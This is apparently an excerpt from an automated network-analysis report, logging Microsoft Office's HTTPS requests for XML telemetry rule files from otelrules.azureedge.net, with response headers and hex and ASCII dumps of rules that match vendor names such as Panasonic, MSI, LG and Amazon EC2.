3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
40	192.168.2.4	49797	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:18 UTC	192	OUT	GET /rules/rule120636v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:19 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:18 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D43097E" x-ms-request-id: 4c33d105-301e-003f-6b44-49266f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185318Z-r1cf579d778dfdgnhC1EWRd3w000000005x0000000007nsr x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:19 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
41	192.168.2.4	49798	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:18 UTC	192	OUT	GET /rules/rule120638v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:19 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:18 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT ETag: "0x8DC582B92FCB436" x-ms-request-id: 759a56cd-c01e-0046-631d-492db9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185318Z-r1cf579d778xr2r4hC1EWRqvfs000000063g000000007p0y x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:19 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.4	49799	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:20 UTC	192	OUT	GET /rules/rule120639v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:21 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:20 GMT Content-Type: text/xml Content-Length: 423 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT ETag: "0x8DC582BB7564CE8" x-ms-request-id: c11f8514-901e-0048-1305-48b800000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185320Z-r1cf579d778zvkpnhC1EWRv23g00000006a000000000anqc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:21 UTC	423	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.4	49800	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:20 UTC	192	OUT	GET /rules/rule120640v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:21 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:20 GMT Content-Type: text/xml Content-Length: 478 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT ETag: "0x8DC582B9B233827" x-ms-request-id: 00885abd-f01e-001f-4d2e-495dc8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185320Z-r1cf579d778pftsbhC1EWRa0gn00000000s00000000022yx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-12-08 18:53:21 UTC	478	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
44	192.168.2.4	49801	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:20 UTC	192	OUT	GET /rules/rule120641v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:21 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:21 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B95C61A3C" x-ms-request-id: e267231f-301e-0099-3103-486683000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185321Z-r1cf579d778qlpkrhC1EWRpfc800000006sg00000000778r x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:21 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.4	49802	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:20 UTC	192	OUT	GET /rules/rule120642v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:21 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:21 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT ETag: "0x8DC582BB046B576" x-ms-request-id: d196cbda-901e-008f-5e03-4867a6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185321Z-r1cf579d778w59f9hC1EWRze6w00000006c0000000006b6u x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:21 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.4	49803	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:21 UTC	192	OUT	GET /rules/rule120643v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:21 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:21 GMT Content-Type: text/xml Content-Length: 400 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2D62837" x-ms-request-id: 32c7b88d-b01e-003e-5b01-488e41000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185321Z-r1cf579d7788pwqzhC1EWRrpd800000006c000000000617t x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:21 UTC	400	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.4	49807	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:23 UTC	192	OUT	GET /rules/rule120645v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:23 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:23 GMT Content-Type: text/xml Content-Length: 425 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BBA25094F" x-ms-request-id: c9f0d292-501e-0047-460d-49ce6c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185323Z-r1cf579d7782v2q5hC1EWRt9bw00000000vg000000005rhx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-12-08 18:53:23 UTC	425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.4	49806	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:23 UTC	192	OUT	GET /rules/rule120644v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:23 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:23 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7D702D0" x-ms-request-id: 08d9915d-201e-005d-1a7e-49afb3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185323Z-r1cf579d7782v2q5hC1EWRt9bw00000000wg00000000573p x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-12-08 18:53:23 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.4	49808	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:23 UTC	192	OUT	GET /rules/rule120646v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:23 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:23 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2BE84FD" x-ms-request-id: 2968f52d-d01e-002b-1502-4825fb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185323Z-r1cf579d778d5zkmhC1EWRk6h800000006q0000000001m22 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:23 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.4	49809	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:23 UTC	192	OUT	GET /rules/rule120647v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:23 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:23 GMT Content-Type: text/xml Content-Length: 448 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB389F49B" x-ms-request-id: 072142d6-401e-0029-0802-489b43000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185323Z-r1cf579d778dndrdhC1EWR4b2400000005rg000000008z64 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:23 UTC	448	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.4	49810	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:23 UTC	192	OUT	GET /rules/rule120648v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:23 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:23 GMT Content-Type: text/xml Content-Length: 491 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B98B88612" x-ms-request-id: 7ea70f1c-301e-005d-1d26-49e448000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185323Z-r1cf579d77867vg8hC1EWR8knc000000060g0000000046dp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
